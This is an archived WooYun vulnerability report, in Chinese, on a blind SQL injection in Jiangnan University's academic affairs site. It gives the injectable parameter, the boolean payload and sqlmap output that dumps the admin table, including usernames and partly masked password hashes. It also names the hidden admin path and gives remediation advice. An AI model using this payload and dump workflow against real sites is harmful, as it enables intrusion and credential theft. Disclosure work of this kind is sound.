乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-13: 细节已通知厂商并且等待厂商处理中 2016-01-14: 厂商已经确认,细节仅向厂商公开 2016-01-24: 细节向核心白帽子及相关领域专家公开 2016-02-03: 细节向普通白帽子公开 2016-02-13: 细节向实习白帽子公开 2016-02-27: 细节向公众公开
江南大学教务处存在SQL注入 可进后台
**.**.**.**http://**.**.**.**:8000/Sort.asp?SortID=19 (GET)获取表名
sqlmap identified the following injection point(s) with a total of 33 HTTP(s) requests:---Parameter: SortID (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: SortID=19 AND 2869=2869---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft Accesssqlmap resumed the following injection point(s) from stored session:---Parameter: SortID (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: SortID=19 AND 2869=2869---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft AccessDatabase: Microsoft_Access_masterdb[4 tables]+-------+| admin || links || news || vote |+-------+
部分数据
sqlmap resumed the following injection point(s) from stored session:---Parameter: SortID (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: SortID=19 AND 2869=2869---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft AccessDatabase: Microsoft_Access_masterdbTable: admin[3 columns]+----------+-------------+| Column | Type |+----------+-------------+| id | numeric || password | non-numeric || username | non-numeric |+----------+-------------+sqlmap resumed the following injection point(s) from stored session:---Parameter: SortID (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: SortID=19 AND 2869=2869---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft AccessDatabase: Microsoft_Access_masterdbTable: admin[2 entries]+----+------------------+----------+| id | password | username |+----+------------------+----------+| 17 | 0f4**********dd0 | songjq || 18 | 7a5**********a0e | admin |+----+------------------+----------+
后台地址http://**.**.**.**/sdfgwter.asp
#1 隐藏管理地址#2 其他页面有过滤,8000端口未过滤#3 尽快修复,已发现有某人插爆了数据库。。。
危害等级:中
漏洞Rank:6
确认时间:2016-01-14 09:03
通知处理中
暂无